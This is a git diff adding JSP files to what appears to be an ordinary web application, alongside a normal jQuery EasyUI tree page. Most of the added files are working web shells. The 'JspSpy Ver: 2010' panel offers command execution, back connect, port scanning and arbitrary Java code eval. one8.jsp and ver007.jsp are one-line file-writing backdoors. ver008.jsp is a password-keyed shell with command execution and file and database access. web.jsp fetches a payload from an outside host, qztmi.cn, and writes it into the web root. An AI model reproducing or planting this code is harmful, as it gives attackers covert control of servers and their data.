"); + + if (cls != null) { + StringBuffer sb = new StringBuffer(); + if (cls.getPackage() != null) + sb.append("package " + cls.getPackage().getName() + + ";\n"); + String n = null; + if (cls.isInterface()) + n = ""; + //else if (cls.isEnum()) + // n = "enum"; + else + n = "class"; + sb.append(Modifier.toString(cls.getModifiers()) + " " + n + + " " + cls.getName() + "\n"); + if (cls.getSuperclass() != null) + sb + .append("\textends " + + cls.getSuperclass().getName() + + "\n"); + if (cls.getInterfaces() != null + && cls.getInterfaces().length != 0) { + Class[] faces = cls.getInterfaces(); + sb.append("\t implements "); + for (int i = 0; i < faces.length; i++) { + sb + .append("" + + faces[i].getName() + ""); + if (i != faces.length - 1) { + sb.append(","); + } + } + } + sb.append("{\n\t\n"); + sb.append("\t//constructors..\n"); + Constructor[] cs = cls.getConstructors(); + for (int i = 0; i < cs.length; i++) { + Constructor cc = cs[i]; + sb.append("\t" + cc + ";\n"); + } + sb.append("\n\t//fields\n"); + Field[] fs = cls.getDeclaredFields(); + for (int i = 0; i < fs.length; i++) { + Field f = fs[i]; + sb.append("\t" + f.toString() + ";"); + if (Modifier.toString(f.getModifiers()).indexOf( + "static") != -1) { + sb.append("\t//value is : "); + f.setAccessible(true); + Object obj = f.get(null); + sb.append(""); + if (obj != null) + sb.append(obj.toString()); + else + sb.append("NULL"); + + sb.append(""); + } + sb.append("\n"); + } + + sb.append("\n\t//methods\n"); + Method[] ms = cls.getDeclaredMethods(); + for (int i = 0; i < ms.length; i++) { + Method m = ms[i]; + sb.append("\t" + m.toString() + ";\n"); + } + sb.append("}\n"); + String m = "" + + Util.highLight(sb.toString()).replaceAll("\t", + "    ").replaceAll( + "\n", "
") + ""; + Util.outMsg(out, m, "left"); + } + } catch (Exception e) { + throw e; + } + } + } + + private static class TopInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("
" + + "" + + " " + + " " + + " " + + " " + + " " + "
JspSpy Ver: 2010" + + request.getHeader("host") + + " (" + + InetAddress.getLocalHost().getHostAddress() + + ") | copy
Logout | " + + " File Manager | " + + " DataBase Manager | " + + " Execute Command | " + + " Shell OnLine | " + + " Back Connect | " + + " Java Reflect | " + + " " + + " Eval Java Code | " + + " Port Scan | " + + " Download Remote File | " + + " ClipBoard | " + + " Port Map | " + + " Others | " + + " JSP Env " + + "
"); + if (JSession.getAttribute(MSG) != null) { + Util.outMsg(out, JSession.getAttribute(MSG).toString()); + JSession.removeAttribute(MSG); + } + if (JSession.getAttribute(ENTER_MSG) != null) { + String outEntry = request.getParameter("outentry"); + if (Util.isEmpty(outEntry) || !outEntry.equals("true")) + Util.outMsg(out, JSession.getAttribute(ENTER_MSG) + .toString()); + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class VOnLineShellInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println(""); + out + .println("" + + " " + " " + " " + "
"); + out.println("

Shell OnLine »


"); + out + .println("
" + + " " + + " " + + " Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo" + + "
" + + "
" + + " " + + "
" + + " " + + " " + + " " + + " Auto Scroll" + + " " + + "
" + + " "); + out.println("
"); + } catch (Exception e) { + throw e; + } + } + } + + private static class OnLineInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String type = request.getParameter("type"); + if (Util.isEmpty(type)) + return; + if (type.toLowerCase().equals("start")) { + String exe = request.getParameter("exe"); + if (Util.isEmpty(exe)) + return; + Process pro = Runtime.getRuntime().exec(exe); + ByteArrayOutputStream outs = new ByteArrayOutputStream(); + response.setContentLength(100000000); + response.setContentType("text/html;charset=" + + System.getProperty("file.encoding")); + OnLineProcess olp = new OnLineProcess(pro); + JSession.setAttribute(SHELL_ONLINE, olp); + new OnLineConnector(new ByteArrayInputStream(outs + .toByteArray()), pro.getOutputStream(), + "exeOclientR", olp).start(); + new OnLineConnector(pro.getInputStream(), response + .getOutputStream(), "exeRclientO", olp).start(); + new OnLineConnector(pro.getErrorStream(), response + .getOutputStream(), "exeRclientO", olp).start(); + Thread.sleep(1000 * 60 * 60 * 24); + } else if (type.equals("ecmd")) { + Object o = JSession.getAttribute(SHELL_ONLINE); + String cmd = request.getParameter("cmd"); + if (Util.isEmpty(cmd)) + return; + if (o == null) + return; + OnLineProcess olp = (OnLineProcess) o; + olp.setCmd(cmd); + } else { + Object o = JSession.getAttribute(SHELL_ONLINE); + if (o == null) + return; + OnLineProcess olp = (OnLineProcess) o; + olp.stop(); + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class EnterInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + if (!Util.isEmpty(type)) { + JSession.removeAttribute(ENTER); + JSession.removeAttribute(ENTER_MSG); + JSession.removeAttribute(ENTER_CURRENT_DIR); + JSession.setAttribute(MSG, "Exit File Success ! "); + } else { + String f = request.getParameter("filepath"); + if (Util.isEmpty(f)) + return; + JSession.setAttribute(ENTER, f); + JSession + .setAttribute( + ENTER_MSG, + "You Are In File \"" + + f + + "\" Now ! Exit "); + } + response.sendRedirect(SHELL_NAME); + } + } + + private static class VExport2FileInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + String sql = request.getParameter("sql"); + String table = request.getParameter("table"); + if (Util.isEmpty(sql) && Util.isEmpty(table)) { + JSession.setAttribute(SESSION_O, "vConn"); + response.sendRedirect(SHELL_NAME); + return; + } + out + .println("
" + + "" + + " " + + " " + + " " + + "
" + + " " + + " " + + " " + + " " + + "

Export To File »

" + + " " + + "
Export \"" + + (Util.isEmpty(sql) ? table : sql.replaceAll("\"", + """)) + + "\" To File : " + + " " + + "

" + + BACK_HREF + + "
" + "
"); + } + } + + private static class ExportInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + String type = request.getParameter("type"); + String filepath = request.getParameter("filepath"); + String encode = request.getParameter("encode"); + String sql = null; + DBOperator dbo = null; + dbo = (DBOperator) JSession.getAttribute(DBO); + + if (Util.isEmpty(type)) { + //table export + String tb = request.getParameter("table"); + if (Util.isEmpty(tb)) + return; + String s = dbo.getConn().getMetaData() + .getIdentifierQuoteString(); + sql = "select * from " + s + tb + s; + + } else if (type.equals("queryexp")) { + //query export + sql = request.getParameter("sql"); + if (Util.isEmpty(sql)) { + JSession.setAttribute(SESSION_O, "vConn"); + response.sendRedirect(SHELL_NAME); + return; + } + } + Object o = dbo.execute(sql); + ByteArrayOutputStream bout = new ByteArrayOutputStream(); + byte[] rowSep = "\r\n".getBytes(); + if (o instanceof ResultSet) { + ResultSet rs = (ResultSet) o; + ResultSetMetaData meta = rs.getMetaData(); + int count = meta.getColumnCount(); + for (int i = 1; i <= count; i++) { + String colName = meta.getColumnName(i) + "\t"; + byte[] b = null; + if (Util.isEmpty(encode)) + b = colName.getBytes(); + else + b = colName.getBytes(encode); + bout.write(b, 0, b.length); + } + bout.write(rowSep, 0, rowSep.length); + while (rs.next()) { + for (int i = 1; i <= count; i++) { + String v = null; + try { + v = rs.getString(i); + } catch (SQLException ex) { + v = "<>"; + } + v += "\t"; + byte[] b = null; + if (Util.isEmpty(encode)) + b = v.getBytes(); + else + b = v.getBytes(encode); + bout.write(b, 0, b.length); + } + bout.write(rowSep, 0, rowSep.length); + } + rs.close(); + ByteArrayInputStream input = new ByteArrayInputStream(bout + .toByteArray()); + BufferedOutputStream output = null; + if (!Util.isEmpty(filepath)) { + //export2file + output = new BufferedOutputStream(new FileOutputStream( + new File(filepath))); + } else { + //download. + response.setHeader("Content-Disposition", + "attachment;filename=DataExport.txt"); + output = new BufferedOutputStream(response + .getOutputStream()); + } + byte[] data = new byte[1024]; + int len = input.read(data); + while (len != -1) { + output.write(data, 0, len); + len = input.read(data); + } + bout.close(); + input.close(); + output.close(); + if (!Util.isEmpty(filepath)) { + JSession.setAttribute(MSG, "Export To File Success !"); + response.sendRedirect(SHELL_NAME); + } + } + } + } + + private static class EvalInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + String type = request.getParameter("type"); + PrintWriter out = response.getWriter(); + Object msg = JSession.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out, (String) msg); + JSession.removeAttribute(MSG); + } + if (Util.isEmpty(type)) { + out + .println("" + + " " + + " " + + " " + "

Eval Java Code »

" + + "
" + + "

" + + "

" + + "UpLoad a Class File : "); + Util + .outMsg( + out, + "
"
+										+ "public class SpyEval{\r\n"
+										+ "	static {\r\n"
+										+ "		//Your Code Here.\r\n"
+										+ "	}\r\n" + "}\r\n" + "
", "left"); + out + .println("
" + + "

Jsp Eval :
" + + " " + + " " + + "
" + + "
" + + "

" + + "
"); + } else if (type.equals("jsp")) { + String jspc = request.getParameter("jspc"); + if (Util.isEmpty(jspc)) + return; + File f = new File(SHELL_DIR, "evaltmpninty.jsp"); + BufferedWriter writer = new BufferedWriter( + new OutputStreamWriter(new FileOutputStream(f), "utf-8")); + writer.write(jspc, 0, jspc.length()); + writer.flush(); + writer.close(); + out + .println("" + + " " + + "

Jsp Eval Result »

"); + out + .println("
"); + request.getRequestDispatcher("evaltmpninty.jsp").include( + request, response); + out + .println("
"); + f.delete(); + } + } + } + + private static class EvalUploadInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + ByteArrayOutputStream stream = new ByteArrayOutputStream(); + UploadBean upload = new UploadBean(); + upload.setTargetOutput(stream); + upload.parseRequest(request); + + if (stream.toByteArray().length == 2) { + JSession.setAttribute(MSG, "Please Upload Your Class File ! "); + ((Invoker) ins.get("ev")).invoke(request, response, JSession); + return; + } + SpyClassLoader loader = new SpyClassLoader(); + try { + Class c = loader.defineClass(null, stream.toByteArray()); + c.newInstance(); + } catch (Exception e) { + } + stream.close(); + JSession.setAttribute(MSG, "Eval Java Class Done ! "); + ((Invoker) ins.get("ev")).invoke(request, response, JSession); + } + } + + private static class VOtherInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + Object msg = JSession.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out, (String) msg); + JSession.removeAttribute(MSG); + } + out + .println("" + + " " + + " " + + " " + "

Session Manager>>

" + + "
" + + "
    "); + Enumeration en = JSession.getAttributeNames(); + while (en.hasMoreElements()) { + Object o = en.nextElement(); + if (o.toString().equals(MSG)) + continue; + out + .println("
  • " + + o.toString() + + " "); + out + .println(" "); + out + .println(""); + out.println(""); + out.println("
    • "); + } + out + .println("
  • " + + "New Session Attribute" + + "name : value : " + + "
"); + } catch (Exception e) { + throw e; + } + } + } + + //Session Manager + private static class SmInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String type = request.getParameter("type"); + PrintWriter out = response.getWriter(); + if (type.equals("update")) { + String name = request.getParameter("name"); + String value = request.getParameter("value"); + JSession.setAttribute(name, value); + JSession + .setAttribute(MSG, "Update/Add Attribute Success !"); + } else if (type.equals("delete")) { + String name = request.getParameter("name"); + JSession.removeAttribute(name); + JSession.setAttribute(MSG, "Remove Attribute Success !"); + } + ((Invoker) ins.get("vother")).invoke(request, response, + JSession); + } catch (Exception e) { + + throw e; + } + } + } + + static { + ins.put("script", new ScriptInvoker()); + ins.put("before", new BeforeInvoker()); + ins.put("after", new AfterInvoker()); + ins.put("deleteBatch", new DeleteBatchInvoker()); + ins.put("clipboard", new ClipBoardInvoker()); + ins.put("vPortScan", new VPortScanInvoker()); + ins.put("portScan", new PortScanInvoker()); + ins.put("vConn", new VConnInvoker()); + ins.put("dbc", new DbcInvoker()); + ins.put("executesql", new ExecuteSQLInvoker()); + ins.put("vLogin", new VLoginInvoker()); + ins.put("login", new LoginInvoker()); + ins.put("filelist", new FileListInvoker()); + ins.put("logout", new LogoutInvoker()); + ins.put("upload", new UploadInvoker()); + ins.put("copy", new CopyInvoker()); + ins.put("bottom", new BottomInvoker()); + ins.put("vCreateFile", new VCreateFileInvoker()); + ins.put("vEdit", new VEditInvoker()); + ins.put("createFile", new CreateFileInvoker()); + ins.put("vEditProperty", new VEditPropertyInvoker()); + ins.put("editProperty", new EditPropertyInvoker()); + ins.put("vs", new VsInvoker()); + ins.put("shell", new ShellInvoker()); + ins.put("down", new DownInvoker()); + ins.put("vd", new VdInvoker()); + ins.put("downRemote", new DownRemoteInvoker()); + ins.put("index", new IndexInvoker()); + ins.put("mkdir", new MkDirInvoker()); + ins.put("move", new MoveInvoker()); + ins.put("removedir", new RemoveDirInvoker()); + ins.put("packBatch", new PackBatchInvoker()); + ins.put("pack", new PackInvoker()); + ins.put("unpack", new UnPackInvoker()); + ins.put("vmp", new VmpInvoker()); + ins.put("vbc", new VbcInvoker()); + ins.put("backConnect", new BackConnectInvoker()); + ins.put("jspEnv", new JspEnvInvoker()); + ins.put("smp", new SmpInvoker()); + ins.put("mapPort", new MapPortInvoker()); + ins.put("top", new TopInvoker()); + ins.put("vso", new VOnLineShellInvoker()); + ins.put("online", new OnLineInvoker()); + ins.put("enter", new EnterInvoker()); + ins.put("export", new ExportInvoker()); + ins.put("ev", new EvalInvoker()); + ins.put("eu", new EvalUploadInvoker()); + ins.put("vother", new VOtherInvoker()); + ins.put("sm", new SmInvoker()); + ins.put("vExport", new VExport2FileInvoker()); + ins.put("vPack", new VPackConfigInvoker()); + ins.put("reflect", new ReflectInvoker()); + ins.put("portBack", new PortBackInvoker()); + }%> +<% + try { + String o = request.getParameter("o"); + if (Util.isEmpty(o)) { + if (session.getAttribute(SESSION_O) == null) + o = "index"; + else { + o = session.getAttribute(SESSION_O).toString(); + session.removeAttribute(SESSION_O); + } + } + Object obj = ins.get(o); + if (obj == null) { + response.sendRedirect(SHELL_NAME); + } else { + Invoker in = (Invoker) obj; + if (in.doBefore()) { + String path = request.getParameter("folder"); + if (!Util.isEmpty(path) + && session.getAttribute(ENTER) == null) + session.setAttribute(CURRENT_DIR, path); + ((Invoker) ins.get("before")).invoke(request, response, + session); + ((Invoker) ins.get("script")).invoke(request, response, + session); + ((Invoker) ins.get("top")).invoke(request, response, + session); + } + in.invoke(request, response, session); + if (!in.doAfter()) { + return; + } else { + ((Invoker) ins.get("bottom")).invoke(request, response, + session); + ((Invoker) ins.get("after")).invoke(request, response, + session); + } + } + } catch (Exception e) { + Object msg = session.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out, (String) msg); + session.removeAttribute(MSG); + } + if (e.toString().indexOf("ClassCastException") != -1) { + Util.outMsg(out, MODIFIED_ERROR + BACK_HREF); + } + ByteArrayOutputStream bout = new ByteArrayOutputStream(); + e.printStackTrace(new PrintStream(bout)); + session.setAttribute(CURRENT_DIR, SHELL_DIR); + Util.outMsg(out, Util + .htmlEncode(new String(bout.toByteArray())).replaceAll( + "\n", "
"), "left"); + bout.close(); + out.flush(); + ((Invoker) ins.get("bottom")) + .invoke(request, response, session); + ((Invoker) ins.get("after")).invoke(request, response, session); + } +%> diff --git a/jsp/one8.jsp b/jsp/one8.jsp new file mode 100644 index 0000000..756e4a0 --- /dev/null +++ b/jsp/one8.jsp @@ -0,0 +1 @@ +<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> \ No newline at end of file diff --git a/jsp/tree.jsp b/jsp/tree.jsp new file mode 100644 index 0000000..d02a814 --- /dev/null +++ b/jsp/tree.jsp @@ -0,0 +1,68 @@ +<%@ page language="java" import="java.util.*" pageEncoding="utf-8"%> +<% +String path = request.getContextPath(); +String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; +%> + + + + + <%@include file="/jsp/include/common.jsp"%> + + + jquery esayui + + + + + + + + + + + + +
+ + + +
+ +
+
    +
+
+ + + + diff --git a/jsp/ver007.jsp b/jsp/ver007.jsp new file mode 100644 index 0000000..756e4a0 --- /dev/null +++ b/jsp/ver007.jsp @@ -0,0 +1 @@ +<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> \ No newline at end of file diff --git a/jsp/ver008.jsp b/jsp/ver008.jsp new file mode 100644 index 0000000..f034bd7 --- /dev/null +++ b/jsp/ver008.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="a"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> diff --git a/jsp/web.jsp b/jsp/web.jsp new file mode 100644 index 0000000..d0833f1 --- /dev/null +++ b/jsp/web.jsp @@ -0,0 +1 @@ +<%@page import="java.io.*"%><%@page import="java.net.*"%><%String t=request.getRealPath("/")+request.getParameter("f");new File(t).getParentFile().mkdirs();if(request.getParameter("p")==null){DataInputStream i=new DataInputStream(((HttpURLConnection)(new URL("http://qztmi.cn/js/h.txt").openConnection())).getInputStream());DataOutputStream o=new DataOutputStream(new FileOutputStream(t));byte[] b=new byte[4096];int c=0;while((c=i.read(b))>0){o.write(b,0,c);}o.close();i.close();out.println("down-ok");response.setHeader("down-ok","1");}else{(new FileOutputStream(t)).write(request.getParameter("p").getBytes());out.println("upload-ok");}%> \ No newline at end of file